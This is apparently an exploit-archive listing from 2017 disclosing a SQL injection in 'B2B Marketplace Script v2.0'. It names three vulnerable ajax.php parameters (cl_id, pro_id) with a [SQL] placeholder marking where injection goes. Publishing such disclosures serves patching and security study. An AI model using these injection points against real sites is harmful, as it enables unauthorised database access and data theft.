Home / exploitsPDF  

B2B Marketplace Script 2.0 SQL Injection

Posted on 27 March 2017

# # # # # # Exploit Title: B2B Marketplace Script v2.0 - SQL Injection # Google Dork: N/A # Date: 26.03.2017 # Vendor Homepage: http://eagletechnosys.com/ # Software: http://eaglescripts.com/php-b2b-marketplace-script-v2 # Demo: http://demob2b.xyz/ # Version: 2.0 # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[@]ihsan[.]net # #ihsansencan # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/ajax.php?section=count_classified&cl_id=[SQL] # http://localhost/[PATH]/ajax.php?section=count_tradeleade&cl_id=[SQL] # http://localhost/[PATH]/ajax.php?section=count_product&pro_id=[SQL] # Etc... # # # # #

 

TOP